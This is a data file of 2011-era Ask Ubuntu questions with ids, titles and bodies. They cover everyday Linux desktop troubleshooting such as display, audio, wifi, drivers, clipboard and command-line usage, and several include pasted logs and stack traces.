61284	php scripts are being downloaded from localhost instead of displayed	when i view http : //localhost/ in google chrome , it tries to download the homepage as a file , and does n't display it . i tried http : //localhost/ in firefox 4 and it works fine . in chrome though , loading http : //127.0.0.1 displays my website [ which is php btw ] . 127.0.0.1 is localhost in my /etc/hosts file . how can i make chrome load my local website thru http : //localhost ?
61289	how to verify if my microphone input is dead or ubuntu not detected it yet ? i can hear music but i cant record audio	i have installed 11.04 ubuntu . i can play music i can listen . but i cant use the microphone input , i tried with alsamixer + pavucontrol+ ( arecord -d 10 /tmp/test.wav ) , pavumeter ( apt-get install pavumeter ) , also tried with all related settings . but microphone audio does not get captured . what can be the issue , it was a new pc just installed ubuntu 11.04 * note : laurent advised , i see a noise in equalizer as following : ( but real microphone is not getting captured ) ** enabled one capture only device detection approval
61291	how to permanently disable monitor power saver using the command line ?	i have tried as following : 1 . turn off : export display=:0.0 & & xset dpms force off 2 . turn on : export display=:0.0 & & xset -dpms which works but that is a temporary solution , which does not fix my problem yet . when i reboot system it start again and again the same auto turn off mode . how can i now remotely using ssh turn it off forever ? important : - kiosk ( atm machine will use this option ) - 24/7 advertising display/slides will use this optional note : this guide i followed http : //v2kblog.blogspot.com/2008/08/disabling-monitor-power-saver.html , but permanent solution did not worked .
61294	allowing flash to access the clipboard	i use cacoo.com that is developed in flash ( a tool to make diagrams ) . running it in windows works fine . but in ubuntu , it seems that it ca n't access the system clipboard , blocking actions like ctrl+z or ctrl+c , v , etc. , which i believe need to access the system clipboard . so , how can i give permission to flash to be able to do that ? i think that would fix the problem . i 'm running ubuntu 11.04 , and i just installed it . firefox is the latest version . adobe flash plugin version 10 .
61298	why is ubuntu 's clipboard so hit and miss ?	i find that a lot of the time if i copy some text for example and then close the window being copied from , the paste function does not paste anything . i 've noticed this in ubuntu 9.04 right up until present version . is there a work around for this ? is there any reason why the developers are not looking into this ?
61299	how do i check how much physical ram i am using in gb or mb format ?	how do i check my whether my ubuntu is 32-bit or 64-bit and whether or not it is using full ram ? i 'm concerned that because my system is 32-bit it is n't using the maximum os-supported ram . it says my pc has 8gb ram , but how do i verify it is using or detecting this as 8gb ram ? regarding sotanaht 's answer : the system tab shows release 11.04 ( natty ) , kernel linux 2.6.38-11-generic-pae , gnome 2.32.1 . follow up : after finding my answer . because i have 8gb hardware ram , i do n't want to be restricted to 4gb ram , therefore removing my 32-bit ubuntu 11.04 , and downloading 64-bit ubuntu 11.04 ( so that my applications can utilize full hardware ram too , specially for 3d animation rendering , image processing , video editing )
61305	electricsheep screensaver wo n't start	after the installation of electricsheep , the screensaver wo n't work : it starts fading to black then , when it should display the screensaver , it suddenly goes back to desktop . i read that disabling compiz should fix this behaviour but i do n't want to go 2d-unity . i 'm using natty . any suggestion ?
61310	problem recovering from s2disk	occasionally , when i recover from s2disk , i get stuck with the following image being displayed on the monitor : the only way out seems to be power cycling the machine . it 's an asus k42jr laptop running ubuntu 10.04 lts . how do i go about looking for the cause of this problem ? are there any log files that are likely to contain helpful hints ? suspending using s2ram seems to work ok ( provided i use the -- force flag ) .
61316	why charmap in ubuntu for lydian not showing up the correct character set	why charmap in ubuntu 11.04 for lydian not showing up the correct character set . i checked couple of different character sets ( javanese ) , its showing up the same boxed hexdecimal values .
61320	i request any troubleshooting for the audio in webex	i have ubuntu 10.04 in toshiba nb255-sp1002m 32 bits mini-notebook . i have installed webex and its plugging sun java 6k and another utilities , following the next indications : http : //goinggnu.wordpress.com/2010/05/13/webex-in-ubuntu-10-04-lucid-lynx/ apparently , webex works very fine ; if you test it from the webex main page : http : //www.webex.com/test-meeting.html it says `` congratulations ! your system is now set up properly ... '' . we must remember it is a simulated procedure . when i used by first time my system , in a real environment ( in a course ccnp video-conference in real time ) , the video is fine , and the audio is fine . however , when i open the microphone , the audio vanish ( they do not ear me , and i do n't ear them ) and by consequence i need to restart the application , so no opportunity exist for me to talk , but , if i subsequently open and close the microphone , i already do not ear the conference , so i need restart the webex and by consequence i loss minutes very importants . in all the applications ( i.e . skype , msn , etc ) no problems exist with the audio . only i have this problem with webex , so probably it 's is any mismatch with the software webex or java with the ubuntu 10.04 , as far as i know . so apparently the webex in my system is fine , but in order of the problem , above , it means a low and poor performance . i have made all the available updates ( synaptic , repositories , etc ) , and i have cleaned the system with bleachbit , so no i do not have any manner to test the system ; the only opportunity that i have is waiting the next conference session , but it is critical moment , you know . my question is , what is the problem and/or what can i do ?
61324	will the switch to wayland fix not being able to paste from closed windows ?	i have recently read about how xorg is to blame for the infamous bug in which a user can not copy and paste from a window after they have closed it . and i also know about the planned eventual switch to wayland as a replacement for x . if this bug is a result of x , and x will be replaced by wayland , then is it possible that a fix will come at that time ? i 'm curious as to whether this is technically possible , and if it 's currently in the plans for it .
61325	problems streaming upnp/dlna from ubuntu machine	i 've set up both mediatomb and minidlna on my ubuntu 10.04 pc . they both stream media perfectly to my android phone ( samsung galaxy ) and google tv ( logitech revue ) using upnp . yet my laptop ( ubuntu 11.04 ) , does not see my pc 's services on the network . update forgot to mention that , on my laptop , i 've tried both boxee and totem , with the coherence plugins , with no results .
61326	difficulty connecting to a wpa2 enterprise network , then disconnects after 20-30 minutes	my university is using a wpa2 enterprise network , it has these properties : authentication : peap ( version 0 ) inner authentication : mschapv2 connecting to the wifi is almost impossible all the time . but sometimes it does connect . but only stays connected for 20-30 minutes , and then disconnects . i 'll post the output of nm-tool too , just in case . ( while connected to the home network , it gives no trouble ) . when searching the forums , it seemed that this was a common issue , but through hours of searching i could n't find a solution . if anyone knows of any fix , please let me know . output of nm-tool follows . - device : wlan0 [ home ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlagn state : connected default : yes hw address : ac:72:89:3a:71:95 capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes output of : uname -a linux vostro 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:02:55 utc 2011 x86_64 x86_64 x86_64 gnu/linux
61336	dynamic shortcuts for messaging menu ?	i 'm unity mail developer and i wonder if it 's possible to add a shortcut to messaging menu from within the application ( it 's written in python ) . i need to connect it 's user-display to a function in the application . for example , this is needed for `` mark all as read '' command . the specification only says about static shortcuts , which are added to .desktop file : in the .desktop file itself , an application may specify shortcut actions that can be invoked regardless of whether the program is running . the syntax of these actions is defined in applicationshortcuts .
61337	why is synaptic downloading packages for both amd64 and i386 ?	i 'm running oneiric 64-bit , and since i 've upgraded i notice synaptic has split the repositories into 64-bit and 32-bit , but it 's downloading archive lists for both of them , taking twice the time as before . can anyone explain why this is and whether i can stop it ?
61339	what is the screen locking mechanism under kde ?	i installed kde desktop on my ubuntu : root @ desktop : /var/log # dpkg -l|fgrep -i kde-plasma-desktop ii kde-plasma-desktop 5:63ubuntu16 the kde plasma desktop and minimal set of applications root @ desktop : /var/log # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty root @ desktop : /var/log # i just wanted to know that if i press `` ctrl+alt+l '' then what is the process/application that locks the screen ? under gnome it 's gnome-screensaver . what is it under kde ?
61340	gnu screen hangs on the pandaboard	i 've installed the headless 11.04 variant of ubuntu on my pandaboard . most things seem to work correctly , but when i launch screen bash seems to hang and i must kill it using ctrl-z kill % 1 in order to continue . has anyone been able to use screen on the pandaboard ? any good leads about how to debug this unfortunate behavior ? when i start an strace debug i get the following messages : mprotect ( 0x4008b000 , 4096 , prot_read ) = 0 munmap ( 0x40123000 , 30983 ) = 0 getrlimit ( rlimit_nofile , { rlim_cur=1024 , rlim_max=4*1024 } ) = 0 close ( 1023 ) = -1 ebadf ( bad file descriptor ) close ( 1022 ) = -1 ebadf ( bad file descriptor ) close ( 1021 ) = -1 ebadf ( bad file descriptor ) close ( 1020 ) = -1 ebadf ( bad file descriptor ) close ( 1019 ) = -1 ebadf ( bad file descriptor ) close ( 1018 ) = -1 ebadf ( bad file descriptor ) ... the close messages continues for some time then it says : directory '/var/run/screen ' must have mode 775 . following the chmod screen hangs again . a new strace screen reveals : mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x40084000 write ( 1 , `` directory '/var/run/screen ' must '' ... , 49directory '/var/run/screen ' must have mode 777. ) = 49 exit_group ( 1 ) = ? in either case it seems broken ...
61341	why network button not working when i clicked it	sometimes i clicked this network button : http : //www.divshare.com/download/15716721-6fa why it does n't work ( just like i have n't clicked it ) ? when it failed , only when i reboot , it works again . sometimes it failed again . what could i do ? i use ubuntu 11.04 64 bits .
61342	how do i run windows 8 via virtualization ?	i would like to run windows 8 within a virtual machine under ubuntu . my quick attempt with vmware failed . has anyone reached to run windows 8 on ubuntu ? ps : microsoft just released a public preview of windows 8 -- see http : //dev.windows.com
61344	what do each of the colors of files/folders returned from running the ls command mean in gnome terminal ?	when i run the # ls command , a list of files and folders are returned . some of them are colored blue , others green . i 'm new to terminal and just wanted to know if there were other colors and what each color says about the file or folder .
61346	equivalent to os x window groups ?	i would like to save a set of windows and their locations and have a shortcut to restore them . is there an ubuntu equivalent to os x 's window groups ?
61347	downloading through ubuntu software center gives an error	i am using ubuntu 11.04 and downloading with the ubuntu software center gives an error ( there seems to be a programming error in aptdaemon ) . i have n't done anything weird , did not try to install wine or anything . no idea what happened . what can i do to solve this issue ?
61349	how can i use opera web browser as remote access application ?	my ubuntu 11.04 has opera web browser . and behind complex nat i have another pc with ubuntu 11.04 . in that pc i saw skype works . now pc1 would like to connect pc2 . without using teamviewer/logmein.com nor ultravnc is best solution for this case . any idea ? how can we do this with opera web browser in ubuntu to crossplatform remote access ? scenario 1 : pc2 will open opera webbrowser pc2 will click let them login or let anyone login pc1 received a phone call , user of ubuntu open his tools pc1 connects to pc2 ( without involving any commercial paid services , like skype nat/firewall technique ) appreciate your advise , thanks .
61362	dedicated grub2 partition and windows 8	ok so as many of you may know the windows 8 developer preview was released today and as such i 'm very eager to use it but i have both ubuntu and windows 7 installed on my machine . i do n't want to disturb these drives and have recently set up a dedicated grub partition on /media/sdb8 my question is if i install windows 8 will it overwrite the grub partition and if so what are the steps i should take to recover it .
61363	how to pipe single result from output of locate command to another command ?	after running the following command ... # locate -i `` little '' i receive these results . /mnt/external/songs/the white stripes/ [ 1999 ] the white stripes/14 little people.mp3 /mnt/external/songs/the white stripes/ [ 2000 ] de stijl/03 little bird.mp3 /mnt/external/songs/the white stripes/ [ 2001 ] white blood cells/06 - little room.mp3 /mnt/external/songs/the white stripes/ [ 2003 ] elephant/the white stripes - elephant - 10 - little acorns.mp3 /mnt/external/songs/the white stripes/ [ 2005 ] get behind me satan/11 little ghost.mp3 /mnt/external/songs/the white stripes/ [ 2007 ] icky thump/little cream soda.mp3 how do i pipe one of the results of the locate command to another command . essentially i 'll be prepending `` totem '' ( media player ) to the location of file and then i 'll execute the command to play one of the songs . edit : i just realized i ca n't copy and paste with the mouse because a lot of the albums ; i have the years encased in parathensis ( ex . elephant ( 2003 ) ) which have to be manually escaped ... 2nd edit : roland , i am running locate to find the path of the song so i can play the song using totem media player . # totem /mnt/external/songs/the white stripes/ [ 2007 ] icky thump/little cream soda.mp3 essentially i would like to know how to copy the path of a song location returned by the locate command , and then paste that location into the terminal so i can give totem a location of the song .
61364	11.04 ati radeon hd 5600 dual monitor issue	i have an issue when i try to work with dual monitor : ihave a hp dv7 with ati radeon hd 5600 and a benq external monitor . i have instaled the properietary ati drivers when i plug my external monitor , the system freeze with balck screen with just the mouse pointer showed but freezed too . if i try to restart i can see the dual monitor working buit just mirrored , if i try to move to not mirrored monitors , the system freeze another time with black screen and the mouse pointer freezed . the same issue i experiment even if i try , with my second monitor unplugged , to change the resolution of my laptop monitor any idea ? please help thanks in advance
61365	why does the computer only connect to the network ( e.g . eth0 ) when you log in ?	not sure if this has always been the case , but i notice that only when i log in , does the computer establish a network connection ( e.g . on eth0 ) . is this the standard behaviour ? what if i wanted the computer to connect to the network without me logging in so i can log in remotely ?
61367	how do i search within a particular directory using the locate command ?	sorry , this question is going to be total newb factor . how do i search within a particular directory using the locate command ? the following command is n't working for me : # locate -i mnt/external/songs/ '' tangerine '' i would like to search within the `` songs '' folder .
61378	file dialog is crashing , where do i report the bug ?	whenever i try to open a file , for example within gedit , an application crashes immediately . the same happens with other apps . if it does matter , i 'm connecting to ubuntu remotely via vnc . here is the stacktrace : *** glibc detected *** gedit : malloc ( ) : memory corruption : 0x000000000130b8e0 *** ======= backtrace : ========= /lib/libc.so.6 ( +0x774b6 ) [ 0x7fb39b50f4b6 ] /lib/libc.so.6 ( +0x7b55f ) [ 0x7fb39b51355f ] /lib/libc.so.6 ( __libc_malloc+0x6e ) [ 0x7fb39b51438e ] /usr/lib/libpixman-1.so.0 ( +0x1724b ) [ 0x7fb3982a324b ] /usr/lib/libpixman-1.so.0 ( pixman_image_create_solid_fill+0x9 ) [ 0x7fb3982c48b9 ] /usr/lib/libpixman-1.so.0 ( pixman_image_fill_boxes+0x23a ) [ 0x7fb3982be63a ] /usr/lib/libstdc++.so.6.0.14 ... 7fb38ab43000-7fb38ad42000 -- -p 000e8000 09:02 133465 /usr/lib/libstdc++.so.6.0.14 7fb38ad42000-7fb38ad4a000 r -- p 000e7000 09:02 133465 /usr/lib/libstdc++.so.6.0.14 7fb38ad4a000-7fb38ad4c000 rw-p 000ef000 09:02 133465 /usr/lib/libstdc++.so.6.0.14 7fb38ad4c000-7fb38ad61000 rw-p 00000000 00:00 0 7fb38ad61000-7fb38ad6c000 r-xp 00000000 09:02 8257554 /usr/lib/enchant/libenchant_ispell.so 7fb38ad6c000-7fb38af6c000 -- -p 0000b000 09:02 8257554 /usr/lib/enchant/libenchant_ispell.so 7fb38af6c000-7fb38af6d000 r -- p 0000b000 09:02 8257554 /usr/lib/enchant/libenchant_ispell.so 7fb38af6d000-7fb38af6e000 rw-p 0000c000 09:02 8257554 /usr/lib/enchant/libenchant_ispell.so 7fb38af6e000-7fb38afae000 r-xp 00000000 09:02 134452 /usr/lib/libibus.so.2.0.0 7fb38afae000-7fb38b1ae000 -- -p 00040000 09:02 134452 /usr/lib/libibus.so.2.0.0 7fb38b1ae000-7fb38b1af000 r -- p 00040000 09:02 134452 /usr/lib/libibus.so.2.0.0 any ideas ? thanks
61379	is gnome keyring safe ?	i 've always read keyring like gnome-keyring is safe way to save credentials . i do n't understand it . if i open my gnome-keyring in my ubuntu desktop , i can right click any entry and click show password and it will show the password : o . my point is if i can do it anyone who can access my computer can do it . i ca n't keep my computer attended every second and sometimes i can forget to lock the computer . i 've set option to unlock keyring automatically at login . without that i 've to type keyring password every time the keyring has to be accessed . so its either type the keyring password or type the asked password . now if i really have to type i 'd prefer to eliminate the middle man and type the asked password . so my question is , am i thinking/taking/doing this keyring thing in wrong way ? or is it the way it is ? if its the way it is , how is it safe ?
61382	what is the easiest way to do multi party video conferencing	whats the best way to : create a video conference that can handle at least 4 people . stream your desktop to be viewed by multiple people in the conference .
61383	chromium keeps crashing	i was clearing the cache/temp internet files from chromium , and did a silly thing , while it was still clearing , i close chromium too quickly ... now when i try to clear the cache/temp internet files , chromium just disappears .
61384	where do i find an up-to-date version of boost ?	where can i find up-to-date packages for boost on maverick/natty/oneiric/precise ? ideally , i would like the latest 1.47.0 and be able to update that to the next release when it comes out .
61390	why does my laptop think my battery is dead ?	i 've got about a 3 or 4 hour battery life on my laptop . i 've had ubuntu 11.04 on it for a week or so now , and yesterday , it started telling my i had a critically low battery ( .3 % ) , and suspends . when i plug it in and unplug it a few times , it stops complaining , and runs for hours . is there a way i could fix this , or even just tell ubuntu to ignore a critically low battery ?
61391	why does ubuntu one android not sync video	i have u1 android client and have auto-upload photos on . so far so good , photos all upoaded to cloud folder ... a new photo taken uploads right away . the problem is any phone capable of running android ( ie smartphone ) , not only takes photos but video as well . how do i get my video to sync with cloud as well as photo ?
61392	unity not working with main user ( created under previous ubuntu version ) , working with a new user	my graphic card is a nvidia geforce gtx 470 , under the previous ubuntu version the driver was showed as installed but not activated , so i dont had unity 3-d . i updated to oneiric beta . the new updated driver is showed as installed and activated , but my account ( i had only a single account in the system ) only could log in unity 2d , trying to log in ubuntu ( 3-d ) mode only showed nautilus , not any other application , or the launcher . if i log in guest mode or if i make a new brand account , unity 3-d works , so obviously something in my main account home folder is messing with unity and my video settings . can anyone point me where to look ? i dont think that this is a question specific to oneiric , because as i say , all seems to work with a newly created account .
61393	how to end ubuntu-one related processes automatically ?	i am running ubuntu-one on my maverick machine . since i do not want it to sync my data all the time i have removed it from the startup programs . so , whenever i want my files to be uploaded to the cloud i manually start ubuntu-one and keep it running until it 's done . sadly , the related processes such as beam.smp or syncdaemon continue to run and consume lots of memory . ending all these processes manually is a way to go , but it is n't really convenient . is there any way to simply end ubuntu-one after syncing with just one click ?
61395	what 's the latest video card that will work on a 64-bit system ?	what kind of recent graphics card can i run under ubuntu 11.04 64-bit ?
61396	how do i install the nvidia drivers ?	i just ordered the nvidia gtx 560 card , which should arrive tomorrow . i have a dilemma , though . should i keep using the driver which is available in `` additional drivers '' in ubuntu ( 10.10 ) , or should i install the driver from the nvidia site ? note - the methods to install explained here apply to all nvidia , ati & intel video cards the latest driver available at the nvidia site : linux x64 ( amd64/em64t ) display driver version : 280.13 certified release date : 2011.08.01 operating system : linux 64-bit language : english ( u.s. ) file size : 52.4 mb i should point out that i do n't need the card to unleash its full potential in ubuntu ( i have windows for gaming , other hdd ) , i just need it to work properly , that meaning the power saving should work ( i do n't want the card to overheat for no reason ) , also i would like the fans to work at proper speeds , etc . so which driver is the best for me ?
61397	can i have a single login for multiple machines ?	i 've got three identical machines for my 3 kids , running narwhal , but i 'd like to replicate the user accounts across all 3 so anyone can login on any machine without me having to create all accounts on all 3 machines . ideally , this would include storing their home directory stuff on a windows server ( or one of the 3 machines ) , and replicating their desktop settings , etc . the windows server is all set up , samba 's running , i can map it , etc . i just have n't bothered yet because i did n't want to replicate the same work 9 times . ( 15 if you include the guest account and my account . )
61399	mailbox monitor and scripting	this is something i have n't done before ... so not sure what some good resources or a solid starting point would be . what i want to do ... is on my ubuntu server 10.10 box , i need to setup a mailbox ... lets call it : oncall . when this mail-box receives a messages , i want to process it with something ( bash most likely , although i 'm not averse to learning something in something else ) . say i get a message : from : program @ localhost to : oncall @ localhost subject : error message my program generated an error that you should know about ... # page jdoe it would then process the message through a secondary system ( log into secondary system using an already existing pager system , that includes a scheduler for the oncall person , phone numbers , etc ) . logon to remote system > > page : jdoe subject : error message body my program generated an error that you should know about ... if something already exists ( does n't it always ? ) that would be awesome ... otherwise , i need to roll something simple of my own . rather than fumbling around , figured i 'd get expert advice first .
61407	segmentation fault error ( ghostscript )	out of the blue i started getting `` segmentation fault '' errors while trying to process some files with ghostscript . i opened synaptic and re-installed this package , but no change . syslog lists this : kernel : [ 166.175140 ] gs [ 1941 ] : segfault at 40 ip 00c788e1 sp bfed7ab0 error 4 in libgs.so.9.01 [ af8000+453000 ] kernel : [ 282.527975 ] gs [ 2019 ] : segfault at 40 ip 083428e1 sp bfee8de0 error 4 in libgs.so.9.01 [ 81c2000+453000 ] kernel : [ 316.329986 ] gs [ 2040 ] : segfault at 40 ip 077dd8e1 sp bf8eeda0 error 4 in libgs.so.9.01 [ 765d000+453000 ] kernel : [ 941.912510 ] gs [ 2323 ] : segfault at 40 ip 077598e1 sp bfa264b0 error 4 in libgs.so.9.01 [ 75d9000+453000 ] kernel : [ 957.390037 ] gs [ 2334 ] : segfault at 40 ip 00e558e1 sp bfdaf5c0 error 4 in libgs.so.9.01 [ cd5000+453000 ] what should i do now ? if i try to completely remove gs then re-install , it 'll remove half of my system . update : i downloaded libgs9_9.01~dfsg-1ubuntu5_i386.deb , then extracted libgs.so.9.01 sudo mv /usr/lib/libgs.so.9.01 /usr/lib/libgs.so.9.01.shit sudo cp libgs.so.9.01 /usr/lib/ segfault again : (
61408	what is a command to compile and run c++ programs ?	i am new to linux . i am using ubuntu 11.04 and do not know how to compile and execute c++ program in it . i need to know the commands to compile and execute a c++ program in linux .
61413	growl-type messages in ubuntu	i 'm working on a python application that runs in the system tray and displays notifications to the user in the form of popups . it uses growl on macs and growl for windows on windows . i 've tried notify-send in ubuntu , but it wo n't display a new message until the last message displayed goes away . sometimes , i need to display 2 messages in quick succession , so that 's no good . what else is out there that i could use ?
61419	change the window manager unity-2d launches on login	as opposed to this question , i 'd like to change the window manager that unity-2d launches when logging in . iow , when i select a `` unity 2d '' session at the greeter screen and log in , i want to change things such that a different window manager is launched instead of metacity . neither setting the : /desktop/gnome/applications/window_manager/default nor the /desktop/gnome/session/required_components/windowmanager gconf keys seems to make a difference . how can this be done ? i 'm running ubuntu 11.04 . $ apt-cache policy unity-2d unity-2d : installed : 3.8.4.1-0ubuntu1 candidate : 3.8.4.1-0ubuntu1 version table : *** 3.8.4.1-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/main i386 packages 100 /var/lib/dpkg/status
61423	how can i change the hidden attribute of a file/folder ? ( alternative to attrib filename -h )	on a ms based system ( windows , any versions ) you can use the attrib command in order to change the attributes on a specified file , directory or directory with recursively changing the files inside the directory also , the command may look like : attrib foldername -s -r -a -h /s /d which will remove any attributes to a specified foldername including the files/folders inside of it . when a virus modifies these attributes to the files/folders in a removable device ( usb/sd memory/hdd ) in order to hidden them from the user , i use my ubuntu os based computer and plug the device in the appropriate slot and i can see all the files/folders and manually remove the undesired items on the device . but i am in need to run to a ms os based computer/laptop in order to change the attributes via command line ( cmd ) and this way , `` bring back '' the items visible to the rest of the people . ubuntu is having the ability to change the file properties via gui or chmod , but i have n't found a way yet to remove the hidden ( attrib -h ) attribute in a file/folder . is it there a way to do this ? no matters if is a gui or terminal
61425	mouse usb stopped after update	i have a sony vaio cw23fx and use a wireless usb mouse and it worked perfect until the 2 days ago . now the mouse is a little crazy . when i use chromium it works fine , but with i try to click ther unity bar or other application or alt+tab or superbutton dont work ( ctrl+alt+right or left works ) . if i power off the mouse and use the touchpad , back to works fine , if i back for the usb mouse for a little time works fine and then bug again . it 's like the mouse freezes in the window i 'm using . i 've read this mouse randomly clicks , jumps and blocks clicking , keyboard then also messes up and tried the xwininfo -all , and returns ca n't grab the mouse . what can i do ?
61428	a single wireless network is not showing up in ubuntu that used too , and other devices have no issue finding or connecting to it	up until about a week ago i could connect to my wireless , but now i suddenly ca n't . every other wireless in the area show up in the network manager . my kindle can connect to it , my friend can connect to it ( in windows ) without having connected to it before . my other netbook ( samsung nc10 ) can connect to it , but my other samsung n150 now can not even see it . i have tried deleting the old auto entry for it in the network manager tried disabling and enabling both the networking and the wireless through the network indicator . disabled the networking through the hardware shortkut key thing [ fn ] + [ f9 ] attempting to connect to it as if it was a hidden network . i 'm at a loss , how would i go about debugging and unborking my computer ?
61429	how do i execute ftp commands on one line ?	this is what i 'm doing when i log into a ftp : ftp user : password @ server ftp : user : password @ server : unknown host ftp > echo hello world ! ftp > quit i 'd like to do a one-line ftp command ... ftp user : password @ server -command `` echo hello world '' or '' echo hello world '' | ftp user : password @ server something similar ... as part of a script i 'm trying to create . nothing is getting transferred , i just need to echo some instructions and this is the easiest way i 've found to do it between two of my systems .
61431	help ! monitor not giving proper edid information	my resolution is stuck at 1024x768 . i 've read through whatever is available here , ubuntuforums , and the ubuntu wiki . but i ca n't seem to fix the issue . i 've reinstalled ubuntu , keeping only my home , var , and opt folders ( mounted on other partitions ) . i 've tried to create a new user ( so home folder is different ) , but still the problem continues . during the reinstallation , the resolution was at the correct value , so i know its not an issue with my monitor . there is no xorg.conf anywhere , and i 'm pretty sure its not an x issue , as i tried booting into safe mode once , and it switched halfway through the boot to the lower resolution . the plymouth boot screen is also the text one . xrandr output xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 768 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) i thought that since the problem persisted after a reinstall , it should be somewhere due to my home folder , and read that the culprit might be a monitors.xml file , probably inside ~/.gnome2/ , but there was no such file . right now , my monitor only supports 1024x768 , shows the monitor as unknown in displays , and defaults to ubuntu-2d . i 'm using dell inspiron 1545 ( intel gm45 , not ati/nvidia ) . i 've been through my history , and the only related thing i could find was installing xmonad , and uninstalling it later . also it refuses to identify an external monitor once i connect it . here is my xorg.0.log file . the output of sudo lshw -c display is as follows : *-display:0 unclaimed description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : f6c00000-f6ffffff memory : e0000000-efffffff ioport : efe8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f6b00000-f6bfffff
61432	add application to autostart	i 've installed system load indicator and set 'autostart ' in preferences . for some reason it does n't load at starting system . how to find out the name/command of this application and then i can add it to `` startup applications preferences '' ? thanks .
61443	is it possible to view webp images in nautilus / photo program ?	i 've converted some images from jpeg to google 's webp image format , which reduces my images ' size by about 90 % ! the big problem is that webp images can only be viewed with a web browser , not with nautilus ( the thumbnails ) and/or any photo program at all . it seems that at this moment there is only a codec for windows . does anyone know if this is also possible in ubuntu ?
61445	is there a variant of ubuntu that comes with none of the bundled software ?	an official copy comes with firefox , amarok or banshee , evolution , games , etc . is there a distro that comes with only the necessary packages , like synaptic to make the system stable , and nothing else ?
61448	how to configure to record data to pendrive instantly ?	if i edit the files on my pendrive , and then just remove it physically , the data will not be recorded . i have to click `` eject '' , and so the led starts to blink , and the data starts to be recorded . how can i change this , so that the data is recorded instantly when changed ? update : ubuntu 11.10 in ubuntu 11.10 i wrote the rules file ( from @ enzotib answer ) , and works , but gives the following message when i try to eject/unmount : ( should i start another question for ubuntu 11.10 ? )
61451	monitors wo n't sleep ( power management ) if synergy or synergyc ? is running	similar question to monitor wo n't enter power save mode , however i only experience the problem under synergy . screensaver settings work , but the monitors never go to sleep . when synergy is not running , monitors go to sleep at the interval set in power mgmt preferences . i 'm running synergy under my user account . dell desktop , ubuntu 11.04 , standard install video drivers ( installing the proprietary drivers causes many errors . ) how can i troubleshoot this issue ?
61455	gnome issues after downgrading from gnome 3	i followed this post on au and then downgraded back to 2.32 . then i followed a tip in a post asking me to add the gnome3 ppa to install a package dconf-settings-backend because my settings were n't being remembered even after installing dconf-tools and libdconf0 . now i have the following issues : the time it takes from gdm login for the desktop-background to paint and the notification area icons to appear and conky to load has gotten high which was n't the case earlier . although i am connected to a network and can browse the internet , there is no network icon in my notification area . although there are files in my desktop folder , i am unable to see them except for ls via terminal the buttons to close , minimize and maximize have disappeared from all windows . nautilus does n't open . when i try to open nautilus via the terminal i encounter this error : nits @ nits-workstation : ~ $ nautilus . gtk-error ** : gtk+ 2.x symbols detected . using gtk+ 2.x and gtk+ 3 in the same process is not supported aborting ... aborted i am guessing there is a package confusion with the upgrade from and downgrade back to gnome2 . please help me fix this . thanks .
61461	how to physically separate partitions for user/home access on demand ?	i 'm searching for months ( if not years ) now for a solution to the following problem : i wish to have a general setup based on the following : pc/laptop/notebook/server with ... 1 ( one ) s-ata compactflash drive ( 8/16/32/64 : :gb ) to hold any linux-partitions needed to deliver a fully running system with root access , but avoiding temporary partitions ( like for updates , installs , downloads etc . ) - just the full core running independent , but far better when combined with the following part [ b ] ... 1 ( one ) s-ata harddiskdrive ( hdd ) holding any temporary partitions needed to make linux running more efficient ( as mentioned under [ a ] delivering temporary space for downloads/updates/installs ) - if possible it should be usable with mbr-partition-type , so that free-space can be used for windows/ntfs and a direct boot via bios-boot-order/grub2 is possible 1 ( one ) pcmcia compactflash adapter to bind encrypted /home-partitions and user-specific settings , which should ( if possible ) be shown up at login screen in the moment one of it is present ( like late-binding of user-specific-data and account-settings , maybe delivered via steady request on hot-swapped pcmcia-device ? ) that 's it ! is it possible ? please do n't do me harm , by giving me instructions on how i could enable a much more secure or insecure , but faster and more reliable way . it 's my mixture and i ask you freaks and geeks who have much more competence on this subject than me , for advice . is it possible to do a late and reactive binding of encrypted /home-partitions and user-accounts ? is it possible to separate ( mostly ) read-only-data and ( mostly ) temporary-data on two physical drives ? if so , please give me the answer . and even if it is not possible with ubuntu ( hopefully with oneiric ocelot ) than maybe it can be accomplished with pure debian or with concurrent linuxos like centos or fedora ? in case , i misunderstood something in general , relating the boot- and or- system/-core-procedures of linux , please leave an explanation . p.s . : if you ca n't understand , why this is important : i realized that compact flash type iii cards deliver much more responsiveness and reliability than hdd or ssd , measured over 3 years experience , by now . and i believe - in physical - it is the best way to make such systems human-compatible -- maybe you should take a deeper look at the measurements of pcmcia-compactflash-adapters if you doubt it ( ever thought of credit- and identity-cards and endurance of memory ? ) in hope i made your heads stumble and i am earning constructive response on this request , i leave with best regards to all of you who think of it before denying .
61464	how do i use my pc as a public address system	i have a set of external speakers for my pc which work very well . i have a microphone which works very well with my pc . how do i get the sound that i make into the microphone to come out the speakers and thus use my pc as a public address system for when i am giving talks in places that there is no pa system ?
61465	powerpc version of ubuntu 10.10 or 10.04 wont boot on my mac	startup disk does not see it as bootable . holding down c gives up and ejects it . i have tried ppc version of cds for both lucid and maverick.the machine is a 867 mhz powerpc g4 with 512 mb ram.i got the isos here and hereany suggestions ?
